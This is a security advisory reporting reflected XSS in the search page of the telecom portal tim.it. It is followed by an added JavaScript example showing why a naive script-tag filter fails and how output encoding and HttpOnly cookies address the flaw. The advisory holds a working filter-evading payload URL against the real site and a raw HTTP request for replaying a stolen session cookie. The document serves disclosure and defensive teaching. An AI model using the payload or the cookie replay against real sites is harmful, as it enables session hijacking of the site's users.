TIM (Telecom Italia Mobile) is a large Italian telephone company. <br>The web portal TIM.it is vulnerable to reflected XSS in its search function (<a href="http://www.tim.it/ricerca/d/areaconsumer/ricercasito.do">http://www.tim.it/ricerca/d/areaconsumer/ricercasito.do</a>): the "query" parameter is reflected into the results page without being encoded. An attacker can steal the victim's session cookie and access the site with the victim's credentials, or inject HTML or arbitrary script code into the page.<br><br>Cookie view/steal (note the space and CR/LF placed inside the opening script tag, encoded as %20%0a%0d; browsers still parse it as a script start tag):<br><br><a href="http://www.tim.it/ricerca/d/areaconsumer/ricercasito.do?query=%3Cscript%20%0a%0d%3Ealert%28document.cookie%29%3B%3C/script%3E&amp;area=119%20Self%20Service">http://www.tim.it/ricerca/d/areaconsumer/ricercasito.do?query=%3Cscript%20%0a%0d%3Ealert%28document.cookie%29%3B%3C/script%3E&amp;area=119%20Self%20Service</a><br><br>Access to the Self Service personal page (replay the stolen cookie):<br><br>GET request to: 
<a href="https://www.tim.it/119/cruscotto/descrizioneservizi/wp.do">https://www.tim.it/119/cruscotto/descrizioneservizi/wp.do</a><br><br>Host: www.tim.it<br>User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20061201 Firefox/2.0.0.4 (Ubuntu-feisty)<br>Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5<br>Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3<br>Accept-Encoding: gzip,deflate<br>Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7<br>Keep-Alive: 300<br>Connection: keep-alive<br>Cookie: [insert the victim's stolen cookie here]<br><br>-- <br>Gianni Amato
<br><a href="http://www.gianniamato.it/">http://www.gianniamato.it/</a>
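<br><br>Added example (not part of the advisory above and not TIM's code): a small JavaScript model of the flaw it describes. The real tim.it server-side code is unknown, so the reflecting handler, the naive block-list filter and the Set-Cookie header below are assumptions for illustration; only the payload string is taken from the advisory's URL. It shows why a filter that looks for the literal text &lt;script&gt; misses that payload (the space and CR/LF sit between the tag name and "&gt;", which an HTML tokenizer accepts), why entity-encoding the reflected query is the actual fix, and how an HttpOnly session cookie would have kept document.cookie away from the injected script (without removing the XSS itself).<br><br>

```javascript
// Added example, not the advisory's or TIM's code. The reflecting handler,
// the naive filter and the Set-Cookie header are assumptions; only the
// payload string comes from the advisory's URL.

// Value of the "query" parameter exactly as it appears in the advisory's link.
const ADVISORY_QUERY =
  "%3Cscript%20%0a%0d%3Ealert%28document.cookie%29%3B%3C/script%3E";

// What the server sees after URL-decoding the parameter:
// "<script \n\r>alert(document.cookie);</script>"
function decodeQuery(encoded) {
  return decodeURIComponent(encoded);
}

// Assumed vulnerable renderer: reflects the search term into HTML unchanged.
function renderSearchVulnerable(query) {
  return "<p>Risultati per: " + query + "</p>";
}

// Assumed naive defence: reject only the literal "<script>" text.
// The advisory's payload contains "<script \n\r>", which this never matches.
function naiveFilterBlocks(query) {
  return /<script>/i.test(query);
}

// An HTML tokenizer accepts whitespace (CR/LF included) or "/" between the
// tag name and ">", so a detector must look for the tag the way a browser does.
function containsScriptStartTag(html) {
  return /<script[\s>\/]/i.test(html);
}

// The actual fix: entity-encode untrusted data before placing it in HTML text.
const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
};
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

function renderSearchSafe(query) {
  return "<p>Risultati per: " + escapeHtml(query) + "</p>";
}

// Defence in depth for the cookie-theft step: a session cookie flagged
// HttpOnly is not exposed through document.cookie, so the injected
// alert(document.cookie) would show nothing useful. It does not fix the XSS.
function setCookieIsHttpOnly(setCookieHeader) {
  return setCookieHeader
    .split(";")
    .slice(1) // skip the name=value pair, keep the attributes
    .some((attr) => attr.trim().toLowerCase() === "httponly");
}

// Walk the advisory's payload through the vulnerable and the fixed renderer.
function demo() {
  const q = decodeQuery(ADVISORY_QUERY);
  return {
    decoded: q,
    naiveFilterCatchesIt: naiveFilterBlocks(q),
    vulnerablePageHasScript: containsScriptStartTag(renderSearchVulnerable(q)),
    safePageHasScript: containsScriptStartTag(renderSearchSafe(q)),
  };
}

console.log(demo());
```

Run with node: the vulnerable page contains a live script start tag that the naive filter did not catch, while the encoded page contains none. Encoding at output time is the fix for this reflection point; HttpOnly on the session cookie only limits what a successful injection can read.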